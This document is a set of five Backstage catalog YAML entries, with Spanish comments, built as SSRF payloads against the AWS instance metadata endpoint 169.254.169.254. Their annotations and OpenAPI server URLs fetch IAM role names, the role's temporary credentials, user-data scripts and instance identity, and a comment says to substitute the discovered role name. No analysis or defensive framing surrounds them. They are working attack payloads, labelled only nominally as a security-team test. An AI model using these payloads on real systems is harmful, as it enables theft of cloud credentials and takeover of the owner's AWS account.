# YAML 1: Obtener lista de roles IAM
apiVersion: backstage.io/v1alpha1
kind: API
metadata:
  name: ssrf-aws-iam-roles
  title: AWS IAM Roles Discovery
  description: Attempting to discover IAM roles from metadata
  annotations:
    github.com/project-slug: newuserx00/business
    backstage.io/techdocs-ref: url:http://169.254.169.254/latest/meta-data/iam/security-credentials/
    backstage.io/source-location: url:http://169.254.169.254/latest/meta-data/iam/security-credentials/
spec:
  type: openapi
  lifecycle: experimental
  owner: security-team
  definition: |
    openapi: 3.0.0
    info:
      title: AWS IAM Roles Test
      version: 1.0.0
    servers:
      - url: http://169.254.169.254/latest/meta-data/iam/security-credentials/
    paths:
      /:
        get:
          summary: Get IAM Roles
          responses:
            '200':
              description: List of IAM roles

---
# YAML 2: Obtener credenciales del rol (necesitas el nombre del rol primero)
apiVersion: backstage.io/v1alpha1
kind: API
metadata:
  name: ssrf-aws-credentials
  title: AWS Credentials Extraction
  description: Attempting to extract IAM credentials
  annotations:
    github.com/project-slug: newuserx00/business
    # Reemplaza ROLE_NAME con el rol que encuentres
    backstage.io/techdocs-ref: url:http://169.254.169.254/latest/meta-data/iam/security-credentials/ROLE_NAME
spec:
  type: openapi
  lifecycle: experimental
  owner: security-team
  definition: |
    openapi: 3.0.0
    info:
      title: AWS Credentials Test
      version: 1.0.0
    servers:
      - url: http://169.254.169.254/latest/meta-data/iam/security-credentials/
    paths:
      /ROLE_NAME:
        get:
          summary: Get IAM Credentials
          responses:
            '200':
              description: IAM credentials (AccessKeyId, SecretAccessKey, Token)

---
# YAML 3: User Data (puede contener secretos)
apiVersion: backstage.io/v1alpha1
kind: API
metadata:
  name: ssrf-aws-userdata
  title: AWS User Data Extraction
  description: Attempting to extract user-data scripts
  annotations:
    github.com/project-slug: newuserx00/business
    backstage.io/techdocs-ref: url:http://169.254.169.254/latest/user-data
spec:
  type: openapi
  lifecycle: experimental
  owner: security-team
  definition: |
    openapi: 3.0.0
    info:
      title: AWS User Data Test
      version: 1.0.0
    servers:
      - url: http://169.254.169.254/latest/user-data
    paths:
      /:
        get:
          summary: Get User Data
          responses:
            '200':
              description: User data script

---
# YAML 4: Instance identity document
apiVersion: backstage.io/v1alpha1
kind: API
metadata:
  name: ssrf-aws-identity
  title: AWS Instance Identity
  description: Attempting to extract instance identity
  annotations:
    github.com/project-slug: newuserx00/business
    backstage.io/techdocs-ref: url:http://169.254.169.254/latest/dynamic/instance-identity/document
spec:
  type: openapi
  lifecycle: experimental
  owner: security-team
  definition: |
    openapi: 3.0.0
    info:
      title: AWS Identity Test
      version: 1.0.0
    servers:
      - url: http://169.254.169.254/latest/dynamic/instance-identity/
    paths:
      /document:
        get:
          summary: Get Instance Identity
          responses:
            '200':
              description: Instance identity document

---
# YAML 5: Múltiples endpoints de metadata
apiVersion: backstage.io/v1alpha1
kind: API
metadata:
  name: ssrf-aws-metadata-full
  title: AWS Metadata Full Scan
  description: Multiple metadata endpoints
  annotations:
    github.com/project-slug: newuserx00/business
    backstage.io/techdocs-ref: url:http://169.254.169.254/latest/meta-data/
spec:
  type: openapi
  lifecycle: experimental
  owner: security-team
  definition: |
    openapi: 3.0.0
    info:
      title: AWS Metadata Full Test
      version: 1.0.0
    servers:
      - url: http://169.254.169.254/latest/meta-data/
    paths:
      /:
        get:
          summary: Root metadata
          responses:
            '200':
              description: List all metadata endpoints
      /instance-id:
        get:
          summary: Instance ID
          responses:
            '200':
              description: EC2 instance ID
      /hostname:
        get:
          summary: Hostname
          responses:
            '200':
              description: Instance hostname
      /local-ipv4:
        get:
          summary: Private IP
          responses:
            '200':
              description: Private IPv4 address
      /public-ipv4:
        get:
          summary: Public IP
          responses:
            '200':
              description: Public IPv4 address
      /security-groups:
        get:
          summary: Security Groups
          responses:
            '200':
              description: Security group names
